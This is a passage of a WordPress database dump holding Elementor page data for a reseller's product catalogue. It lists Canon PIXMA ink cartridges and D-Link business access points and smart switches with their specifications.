Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7105,3328,'_elementor_version','2.5.14'),(8678,3668,'_elementor_edit_mode','builder'),(7112,3329,'_elementor_version','2.5.14'),(7119,3330,'_elementor_version','2.5.14'),(7131,3332,'_elementor_version','2.5.14'),(7138,3333,'_elementor_version','2.5.14'),(7150,3335,'_elementor_version','2.5.14'),(7157,3336,'_elementor_version','2.5.14'),(7171,3338,'_elementor_version','2.5.14'),(7174,3354,'_wp_page_template','template-fullwidth.php'),(7175,3354,'_elementor_template_type','post'),(7176,3354,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>- Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>- Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>- Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>- Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>- Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>- Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>- Provides WLAN partitioning for deployments such as wireless hot spots<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>\\u2022 Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>\\u2022 Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>\\u2022 Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>\\u2022 Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>\\u2022 Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>\\u2022 Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>\\u2022 Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>\\u2022 Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7177,3354,'_elementor_version','0.4'),(7178,3354,'_elementor_edit_mode','builder'),(7181,3355,'_wp_page_template','template-fullwidth.php'),(7182,3355,'_elementor_template_type','post'),(7183,3355,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product 